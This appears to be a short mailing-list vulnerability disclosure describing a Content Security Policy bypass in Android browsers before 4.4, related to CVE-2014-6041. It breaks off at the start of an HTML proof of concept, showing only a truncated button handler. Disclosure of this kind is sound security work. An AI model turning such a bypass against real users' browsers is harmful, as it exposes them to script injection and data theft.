CSP Bypass on Android prior to 4.4

Posted by E Boogie on Oct 12

I’ve found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I’ve tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android
browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value="test" onclick="…
